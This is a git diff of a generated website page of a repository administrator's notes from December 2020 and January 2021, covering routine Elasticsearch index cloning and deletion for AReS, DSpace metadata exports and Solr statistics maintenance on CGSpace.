                                    • Udana sent a report that the WLE approver is experiencing the same issue Peter highlighted a few weeks ago: they are unable to save metadata edits in the workflow
                                    • Yesterday Atmire responded about the owningComm and owningColl duplicates in Solr saying they didn’t see any anymore…
                                        @@ -544,31 +544,31 @@ sys 2m41.097s
                                        • After the Discovery re-indexing finished on CGSpace I prepared to start re-harvesting AReS by making sure the openrxv-items-temp index was empty and that the backup index I made yesterday was still there:
                                        -
                                        $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp?pretty'
                                        -{
                                        -  "acknowledged" : true
                                        -}
                                        -$ curl -s 'http://localhost:9200/openrxv-items-final/_count?q=*&pretty'
                                        -{
                                        -  "count" : 0,
                                        -  "_shards" : {
                                        -    "total" : 1,
                                        -    "successful" : 1,
                                        -    "skipped" : 0,
                                        -    "failed" : 0
                                        -  }
                                        -}
                                        -$ curl -s 'http://localhost:9200/openrxv-items-2020-12-14/_count?q=*&pretty'
                                        -{
                                        -  "count" : 99992,
                                        -  "_shards" : {
                                        -    "total" : 1,
                                        -    "successful" : 1,
                                        -    "skipped" : 0,
                                        -    "failed" : 0
                                        -  }
                                        -}
                                        -

                                        2020-12-16

                                        +
                                        $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp?pretty'
                                        +{
                                        +  "acknowledged" : true
                                        +}
                                        +$ curl -s 'http://localhost:9200/openrxv-items-final/_count?q=*&pretty'
                                        +{
                                        +  "count" : 0,
                                        +  "_shards" : {
                                        +    "total" : 1,
                                        +    "successful" : 1,
                                        +    "skipped" : 0,
                                        +    "failed" : 0
                                        +  }
                                        +}
                                        +$ curl -s 'http://localhost:9200/openrxv-items-2020-12-14/_count?q=*&pretty'
                                        +{
                                        +  "count" : 99992,
                                        +  "_shards" : {
                                        +    "total" : 1,
                                        +    "successful" : 1,
                                        +    "skipped" : 0,
                                        +    "failed" : 0
                                        +  }
                                        +}
                                        +

                                        2020-12-16

                                        • The harvesting on AReS finished last night so this morning I manually cloned the openrxv-items-temp index to openrxv-items
                                            @@ -576,32 +576,32 @@ $ curl -s 'http://localhost:9200/openrxv-items-2
                                        -
                                        $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                        -{
                                        -  "count" : 100046,
                                        -  "_shards" : {
                                        -    "total" : 1,
                                        -    "successful" : 1,
                                        -    "skipped" : 0,
                                        -    "failed" : 0
                                        -  }
                                        -}
                                        -$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                        -$ curl -XDELETE 'http://localhost:9200/openrxv-items?pretty'
                                        -$ curl -s -X POST "http://localhost:9200/openrxv-items-temp/_clone/openrxv-items?pretty"
                                        -$ curl -s 'http://localhost:9200/openrxv-items/_count?q=*&pretty'
                                        -{
                                        -  "count" : 100046,
                                        -  "_shards" : {
                                        -    "total" : 1,
                                        -    "successful" : 1,
                                        -    "skipped" : 0,
                                        -    "failed" : 0
                                        -  }
                                        -}
                                        -$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                                        -$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp?pretty'
                                        -
                                          +
                                          $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                          +{
                                          +  "count" : 100046,
                                          +  "_shards" : {
                                          +    "total" : 1,
                                          +    "successful" : 1,
                                          +    "skipped" : 0,
                                          +    "failed" : 0
                                          +  }
                                          +}
                                          +$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                          +$ curl -XDELETE 'http://localhost:9200/openrxv-items?pretty'
                                          +$ curl -s -X POST "http://localhost:9200/openrxv-items-temp/_clone/openrxv-items?pretty"
                                          +$ curl -s 'http://localhost:9200/openrxv-items/_count?q=*&pretty'
                                          +{
                                          +  "count" : 100046,
                                          +  "_shards" : {
                                          +    "total" : 1,
                                          +    "successful" : 1,
                                          +    "skipped" : 0,
                                          +    "failed" : 0
                                          +  }
                                          +}
                                          +$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                                          +$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp?pretty'
                                          +
                                          • Interestingly the item that we noticed was duplicated now only appears once
                                          • The missing item is still missing
                                          • Jane Poole noticed that the “previous page” and “next page” buttons are not working on AReS @@ -611,24 +611,24 @@ $ curl -XDELETE 'http://localhost:9200/openrxv-i
                                          • Generate a list of submitters and approvers active in the last months using the Provenance field on CGSpace:
                                          -
                                          $ psql -h localhost -U postgres dspace -c "SELECT text_value FROM metadatavalue WHERE metadata_field_id=28 AND text_value ~ '^.*on 2020-(06|07|08|09|10|11|12)-*'" > /tmp/provenance.txt
                                          -$ grep -o -E 'by .*)' /tmp/provenance.txt | grep -v -E "( on |checksum)" | sed -e 's/by //' -e 's/ (/,/' -e 's/)//' | sort | uniq > /tmp/recent-submitters-approvers.csv
                                          -
                                            +
                                            $ psql -h localhost -U postgres dspace -c "SELECT text_value FROM metadatavalue WHERE metadata_field_id=28 AND text_value ~ '^.*on 2020-(06|07|08|09|10|11|12)-*'" > /tmp/provenance.txt
                                            +$ grep -o -E 'by .*)' /tmp/provenance.txt | grep -v -E "( on |checksum)" | sed -e 's/by //' -e 's/ (/,/' -e 's/)//' | sort | uniq > /tmp/recent-submitters-approvers.csv
                                            +
                                            • Peter wanted it to send some mail to the users…

                                            2020-12-17

                                            • I see some errors from CUA in our Tomcat logs:
                                            -
                                            Thu Dec 17 07:35:27 CET 2020 | Query:containerItem:b049326a-0e76-45a8-ac0c-d8ec043a50c6
                                            -Error while updating
                                            -java.lang.UnsupportedOperationException: Multiple update components target the same field:solr_update_time_stamp
                                            -        at com.atmire.dspace.cua.CUASolrLoggerServiceImpl$5.visit(SourceFile:1155)
                                            -        at com.atmire.dspace.cua.CUASolrLoggerServiceImpl.visitEachStatisticShard(SourceFile:241)
                                            -        at com.atmire.dspace.cua.CUASolrLoggerServiceImpl.update(SourceFile:1140)
                                            -        at com.atmire.dspace.cua.CUASolrLoggerServiceImpl.update(SourceFile:1129)
                                            -...
                                            -
                                              +
                                              Thu Dec 17 07:35:27 CET 2020 | Query:containerItem:b049326a-0e76-45a8-ac0c-d8ec043a50c6
                                              +Error while updating
                                              +java.lang.UnsupportedOperationException: Multiple update components target the same field:solr_update_time_stamp
                                              +        at com.atmire.dspace.cua.CUASolrLoggerServiceImpl$5.visit(SourceFile:1155)
                                              +        at com.atmire.dspace.cua.CUASolrLoggerServiceImpl.visitEachStatisticShard(SourceFile:241)
                                              +        at com.atmire.dspace.cua.CUASolrLoggerServiceImpl.update(SourceFile:1140)
                                              +        at com.atmire.dspace.cua.CUASolrLoggerServiceImpl.update(SourceFile:1129)
                                              +...
                                              +
                                              • I sent the full stack to Atmire to investigate
                                                • I know we’ve had this “Multiple update components target the same field” error in the past with DSpace 5.x and Atmire said it was harmless, but would nevertheless be fixed in a future update
                                                • @@ -636,39 +636,39 @@ java.lang.UnsupportedOperationException: Multiple update components target the s
                                                • I was trying to export the ILRI community on CGSpace so I could update one of the ILRI author’s names, but it throws an error…
                                                -
                                                $ dspace metadata-export -i 10568/1 -f /tmp/2020-12-17-ILRI.csv
                                                -Loading @mire database changes for module MQM
                                                -Changes have been processed
                                                -Exporting community 'International Livestock Research Institute (ILRI)' (10568/1)
                                                -           Exception: null
                                                -java.lang.NullPointerException
                                                -        at com.google.common.base.Preconditions.checkNotNull(Preconditions.java:212)
                                                -        at com.google.common.collect.Iterators.concat(Iterators.java:464)
                                                -        at org.dspace.app.bulkedit.MetadataExport.addItemsToResult(MetadataExport.java:136)
                                                -        at org.dspace.app.bulkedit.MetadataExport.buildFromCommunity(MetadataExport.java:125)
                                                -        at org.dspace.app.bulkedit.MetadataExport.<init>(MetadataExport.java:77)
                                                -        at org.dspace.app.bulkedit.MetadataExport.main(MetadataExport.java:282)
                                                -        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
                                                -        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
                                                -        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
                                                -        at java.lang.reflect.Method.invoke(Method.java:498)
                                                -        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
                                                -        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
                                                -
                                                  +
                                                  $ dspace metadata-export -i 10568/1 -f /tmp/2020-12-17-ILRI.csv
                                                  +Loading @mire database changes for module MQM
                                                  +Changes have been processed
                                                  +Exporting community 'International Livestock Research Institute (ILRI)' (10568/1)
                                                  +           Exception: null
                                                  +java.lang.NullPointerException
                                                  +        at com.google.common.base.Preconditions.checkNotNull(Preconditions.java:212)
                                                  +        at com.google.common.collect.Iterators.concat(Iterators.java:464)
                                                  +        at org.dspace.app.bulkedit.MetadataExport.addItemsToResult(MetadataExport.java:136)
                                                  +        at org.dspace.app.bulkedit.MetadataExport.buildFromCommunity(MetadataExport.java:125)
                                                  +        at org.dspace.app.bulkedit.MetadataExport.<init>(MetadataExport.java:77)
                                                  +        at org.dspace.app.bulkedit.MetadataExport.main(MetadataExport.java:282)
                                                  +        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
                                                  +        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
                                                  +        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
                                                  +        at java.lang.reflect.Method.invoke(Method.java:498)
                                                  +        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
                                                  +        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
                                                  +
                                                  • I did it via CSV with fix-metadata-values.py instead:
                                                  -
                                                  $ cat 2020-12-17-update-ILRI-author.csv
                                                  -dc.contributor.author,correct
                                                  -"Padmakumar, V.P.","Varijakshapanicker, Padmakumar"
                                                  -$ ./fix-metadata-values.py -i 2020-12-17-update-ILRI-author.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t 'correct' -m 3
                                                  -
                                                    +
                                                    $ cat 2020-12-17-update-ILRI-author.csv
                                                    +dc.contributor.author,correct
                                                    +"Padmakumar, V.P.","Varijakshapanicker, Padmakumar"
                                                    +$ ./fix-metadata-values.py -i 2020-12-17-update-ILRI-author.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t 'correct' -m 3
                                                    +
                                                    • Abenet needed a list of all 2020 outputs from the Livestock CRP that were Limited Access
                                                      • I exported the community from CGSpace and used csvcut and csvgrep to get a list:
                                                    -
                                                    $ csvcut -c 'dc.identifier.citation[en_US],dc.identifier.uri,dc.identifier.uri[],dc.identifier.uri[en_US],dc.date.issued,dc.date.issued[],dc.date.issued[en_US],cg.identifier.status[en_US]' ~/Downloads/10568-80099.csv | csvgrep -c 'cg.identifier.status[en_US]' -m 'Limited Access' | csvgrep -c 'dc.date.issued' -m 2020 -c 'dc.date.issued[]' -m 2020 -c 'dc.date.issued[en_US]' -m 2020 > /tmp/limited-2020.csv
                                                    +
                                                    $ csvcut -c 'dc.identifier.citation[en_US],dc.identifier.uri,dc.identifier.uri[],dc.identifier.uri[en_US],dc.date.issued,dc.date.issued[],dc.date.issued[en_US],cg.identifier.status[en_US]' ~/Downloads/10568-80099.csv | csvgrep -c 'cg.identifier.status[en_US]' -m 'Limited Access' | csvgrep -c 'dc.date.issued' -m 2020 -c 'dc.date.issued[]' -m 2020 -c 'dc.date.issued[en_US]' -m 2020 > /tmp/limited-2020.csv
                                                     

                                                    2020-12-18

                                                    • I added support for indexing community views and downloads to dspace-statistics-api @@ -689,43 +689,43 @@ $ ./fix-metadata-values.py -i 2020-12-17-update-ILRI-author.csv -db dspace -u ds
                                                      • The DeduplicateValuesProcessor has been running on DSpace Test since two days ago and it almost completed its second twelve-hour run, but crashed near the end:
                                                      -
                                                      ...
                                                      -Run 1 — 100% — 8,230,000/8,239,228 docs — 39s — 9h 8m 31s
                                                      -Exception: Java heap space
                                                      -java.lang.OutOfMemoryError: Java heap space
                                                      -        at java.util.Arrays.copyOfRange(Arrays.java:3664)
                                                      -        at java.lang.String.<init>(String.java:207)
                                                      -        at org.noggit.CharArr.toString(CharArr.java:164)
                                                      -        at org.apache.solr.common.util.JavaBinCodec.readStr(JavaBinCodec.java:599)
                                                      -        at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:180)
                                                      -        at org.apache.solr.common.util.JavaBinCodec.readArray(JavaBinCodec.java:492)
                                                      -        at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:186)
                                                      -        at org.apache.solr.common.util.JavaBinCodec.readSolrDocument(JavaBinCodec.java:360)
                                                      -        at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:219)
                                                      -        at org.apache.solr.common.util.JavaBinCodec.readArray(JavaBinCodec.java:492)
                                                      -        at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:186)
                                                      -        at org.apache.solr.common.util.JavaBinCodec.readSolrDocumentList(JavaBinCodec.java:374)
                                                      -        at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:221)
                                                      -        at org.apache.solr.common.util.JavaBinCodec.readOrderedMap(JavaBinCodec.java:125)
                                                      -        at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:188)
                                                      -        at org.apache.solr.common.util.JavaBinCodec.unmarshal(JavaBinCodec.java:116)
                                                      -        at org.apache.solr.client.solrj.impl.BinaryResponseParser.processResponse(BinaryResponseParser.java:43)
                                                      -        at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:528)
                                                      -        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
                                                      -        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
                                                      -        at org.apache.solr.client.solrj.request.QueryRequest.process(QueryRequest.java:91)
                                                      -        at org.apache.solr.client.solrj.SolrServer.query(SolrServer.java:301)
                                                      -        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.getNextSetOfSolrDocuments(SourceFile:392)
                                                      -        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.performRun(SourceFile:157)
                                                      -        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.update(SourceFile:128)
                                                      -        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI.main(SourceFile:78)
                                                      -        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
                                                      -        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
                                                      -        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
                                                      -        at java.lang.reflect.Method.invoke(Method.java:498)
                                                      -        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
                                                      -        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
                                                      -
                                                        +
                                                        ...
                                                        +Run 1 — 100% — 8,230,000/8,239,228 docs — 39s — 9h 8m 31s
                                                        +Exception: Java heap space
                                                        +java.lang.OutOfMemoryError: Java heap space
                                                        +        at java.util.Arrays.copyOfRange(Arrays.java:3664)
                                                        +        at java.lang.String.<init>(String.java:207)
                                                        +        at org.noggit.CharArr.toString(CharArr.java:164)
                                                        +        at org.apache.solr.common.util.JavaBinCodec.readStr(JavaBinCodec.java:599)
                                                        +        at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:180)
                                                        +        at org.apache.solr.common.util.JavaBinCodec.readArray(JavaBinCodec.java:492)
                                                        +        at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:186)
                                                        +        at org.apache.solr.common.util.JavaBinCodec.readSolrDocument(JavaBinCodec.java:360)
                                                        +        at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:219)
                                                        +        at org.apache.solr.common.util.JavaBinCodec.readArray(JavaBinCodec.java:492)
                                                        +        at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:186)
                                                        +        at org.apache.solr.common.util.JavaBinCodec.readSolrDocumentList(JavaBinCodec.java:374)
                                                        +        at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:221)
                                                        +        at org.apache.solr.common.util.JavaBinCodec.readOrderedMap(JavaBinCodec.java:125)
                                                        +        at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:188)
                                                        +        at org.apache.solr.common.util.JavaBinCodec.unmarshal(JavaBinCodec.java:116)
                                                        +        at org.apache.solr.client.solrj.impl.BinaryResponseParser.processResponse(BinaryResponseParser.java:43)
                                                        +        at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:528)
                                                        +        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
                                                        +        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
                                                        +        at org.apache.solr.client.solrj.request.QueryRequest.process(QueryRequest.java:91)
                                                        +        at org.apache.solr.client.solrj.SolrServer.query(SolrServer.java:301)
                                                        +        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.getNextSetOfSolrDocuments(SourceFile:392)
                                                        +        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.performRun(SourceFile:157)
                                                        +        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.update(SourceFile:128)
                                                        +        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI.main(SourceFile:78)
                                                        +        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
                                                        +        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
                                                        +        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
                                                        +        at java.lang.reflect.Method.invoke(Method.java:498)
                                                        +        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
                                                        +        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
                                                        +
                                                        • That was with a JVM heap of 512m
                                                        • I looked in Solr and found dozens of duplicates of each field again…
                                                            @@ -744,30 +744,30 @@ java.lang.OutOfMemoryError: Java heap space
                                                          • The AReS harvest finished this morning and I moved the Elasticsearch index manually
                                                          • First, check the number of records in the temp index to make sure it seems complete and not with double data:
                                                          -
                                                          $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                          -{
                                                          -  "count" : 100135,
                                                          -  "_shards" : {
                                                          -    "total" : 1,
                                                          -    "successful" : 1,
                                                          -    "skipped" : 0,
                                                          -    "failed" : 0
                                                          -  }
                                                          -}
                                                          -
                                                            +
                                                            $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                            +{
                                                            +  "count" : 100135,
                                                            +  "_shards" : {
                                                            +    "total" : 1,
                                                            +    "successful" : 1,
                                                            +    "skipped" : 0,
                                                            +    "failed" : 0
                                                            +  }
                                                            +}
                                                            +
                                                            • Then delete the old backup and clone the current items index as a backup:
                                                            -
                                                            $ curl -XDELETE 'http://localhost:9200/openrxv-items-2020-12-14?pretty'
                                                            -$ curl -X PUT "localhost:9200/openrxv-items/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                            -$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2020-12-21
                                                            -
                                                              +
                                                              $ curl -XDELETE 'http://localhost:9200/openrxv-items-2020-12-14?pretty'
                                                              +$ curl -X PUT "localhost:9200/openrxv-items/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                              +$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2020-12-21
                                                              +
                                                              • Then delete the current items index and clone it from temp:
                                                              -
                                                              $ curl -XDELETE 'http://localhost:9200/openrxv-items?pretty'
                                                              -$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                              -$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
                                                              -$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                                                              -

                                                              2020-12-22

                                                              +
                                                              $ curl -XDELETE 'http://localhost:9200/openrxv-items?pretty'
                                                              +$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                              +$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
                                                              +$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                                                              +

                                                              2020-12-22

                                                              • I finished getting the Swagger UI integrated into the dspace-statistics-api
                                                                  @@ -810,10 +810,10 @@ $ curl -X PUT "localhost:9200/openrxv-items-temp
                                                    • I exported the 2012 stats from the year core and imported them to the main statistics core with solr-import-export-json:
                                                    -
                                                    $ chrt -b 0 ./run.sh -s http://localhost:8081/solr/statistics-2012 -a export -o statistics-2012.json -k uid
                                                    -$ chrt -b 0 ./run.sh -s http://localhost:8081/solr/statistics -a import -o statistics-2010.json -k uid
                                                    -$ curl -s "http://localhost:8081/solr/statistics-2012/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:*</query></delete>"
                                                    -
                                                      +
                                                      $ chrt -b 0 ./run.sh -s http://localhost:8081/solr/statistics-2012 -a export -o statistics-2012.json -k uid
                                                      +$ chrt -b 0 ./run.sh -s http://localhost:8081/solr/statistics -a import -o statistics-2010.json -k uid
                                                      +$ curl -s "http://localhost:8081/solr/statistics-2012/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:*</query></delete>"
                                                      +
                                                      • I decided to do the same for the remaining 2011, 2014, 2017, and 2019 cores…

                                                      2020-12-29

                                                      @@ -824,31 +824,31 @@ $ curl -s "http://localhost:8081/solr/statistics
                                                  -
                                                  $ curl -s 'http://localhost:9200/openrxv-items/_count?q=*&pretty'
                                                  -{
                                                  -  "count" : 100135,
                                                  -  "_shards" : {
                                                  -    "total" : 1,
                                                  -    "successful" : 1,
                                                  -    "skipped" : 0,
                                                  -    "failed" : 0
                                                  -  }
                                                  -}
                                                  -$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp?pretty'
                                                  -$ curl -X PUT "localhost:9200/openrxv-items/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                  -$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2020-12-29
                                                  -$ curl -X PUT "localhost:9200/openrxv-items/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                                                  -

                                                  2020-12-30

                                                  +
                                                  $ curl -s 'http://localhost:9200/openrxv-items/_count?q=*&pretty'
                                                  +{
                                                  +  "count" : 100135,
                                                  +  "_shards" : {
                                                  +    "total" : 1,
                                                  +    "successful" : 1,
                                                  +    "skipped" : 0,
                                                  +    "failed" : 0
                                                  +  }
                                                  +}
                                                  +$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp?pretty'
                                                  +$ curl -X PUT "localhost:9200/openrxv-items/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                  +$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2020-12-29
                                                  +$ curl -X PUT "localhost:9200/openrxv-items/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                                                  +

                                                  2020-12-30

                                                  • The indexing on AReS finished so I cloned the openrxv-items-temp index to openrxv-items and deleted the backup index:
                                                  -
                                                  $ curl -XDELETE 'http://localhost:9200/openrxv-items?pretty'
                                                  -$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                  -$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
                                                  -$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                                                  -$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp?pretty'
                                                  -$ curl -XDELETE 'http://localhost:9200/openrxv-items-2020-12-29?pretty'
                                                  -
                                                  +
                                                  $ curl -XDELETE 'http://localhost:9200/openrxv-items?pretty'
                                                  +$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                  +$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
                                                  +$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                                                  +$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp?pretty'
                                                  +$ curl -XDELETE 'http://localhost:9200/openrxv-items-2020-12-29?pretty'
                                                  +
                                                  diff --git a/docs/2021-01/index.html b/docs/2021-01/index.html index af3f387ff..695184a5f 100644 --- a/docs/2021-01/index.html +++ b/docs/2021-01/index.html @@ -50,7 +50,7 @@ For example, this item has 51 views on CGSpace, but 0 on AReS "/> - + @@ -160,29 +160,29 @@ For example, this item has 51 views on CGSpace, but 0 on AReS
                                              -
                                              $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                              -# start indexing in AReS
                                              -
                                                +
                                                $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                +# start indexing in AReS
                                                +
                                                • Then, the next morning when it’s done, check the results of the harvesting, backup the current openrxv-items index, and clone the openrxv-items-temp index to openrxv-items:
                                                -
                                                $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                -{
                                                -  "count" : 100278,
                                                -  "_shards" : {
                                                -    "total" : 1,
                                                -    "successful" : 1,
                                                -    "skipped" : 0,
                                                -    "failed" : 0
                                                -  }
                                                -}
                                                -$ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                -$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-01-04
                                                -$ curl -XDELETE 'http://localhost:9200/openrxv-items'
                                                -$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                -$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
                                                -$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                -$ curl -XDELETE 'http://localhost:9200/openrxv-items-2021-01-04'
                                                -

                                                2021-01-04

                                                +
                                                $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                +{
                                                +  "count" : 100278,
                                                +  "_shards" : {
                                                +    "total" : 1,
                                                +    "successful" : 1,
                                                +    "skipped" : 0,
                                                +    "failed" : 0
                                                +  }
                                                +}
                                                +$ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                +$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-01-04
                                                +$ curl -XDELETE 'http://localhost:9200/openrxv-items'
                                                +$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                +$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
                                                +$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                +$ curl -XDELETE 'http://localhost:9200/openrxv-items-2021-01-04'
                                                +

                                                2021-01-04

                                                • There is one item that appears twice in AReS: 10568/66839
                                                    @@ -214,8 +214,8 @@ $ curl -XDELETE 'http://localhost:9200/openrxv-i
                                                -
                                                $ ./doi-to-handle.py -db dspace -u dspace -p 'fuuu' -i /tmp/dois.txt -o /tmp/out.csv
                                                -
                                                  +
                                                  $ ./doi-to-handle.py -db dspace -u dspace -p 'fuuu' -i /tmp/dois.txt -o /tmp/out.csv
                                                  +
                                                  • Help Udana export IWMI records from AReS
                                                    • He wanted me to give him CSV export permissions on CGSpace, but I told him that this requires super admin so I’m not comfortable with it
                                                    • @@ -261,28 +261,28 @@ $ curl -XDELETE 'http://localhost:9200/openrxv-i
                                                  -
                                                  2021-01-10 10:03:27,692 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=1e8fb96c-b994-4fe2-8f0c-0a98ab138be0, ObjectType=(Unknown), ObjectID=null, TimeStamp=1610269383279, dispatcher=1544803905, detail=[null], transactionID="TX35636856957739531161091194485578658698")
                                                  -
                                                    +
                                                    2021-01-10 10:03:27,692 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=1e8fb96c-b994-4fe2-8f0c-0a98ab138be0, ObjectType=(Unknown), ObjectID=null, TimeStamp=1610269383279, dispatcher=1544803905, detail=[null], transactionID="TX35636856957739531161091194485578658698")
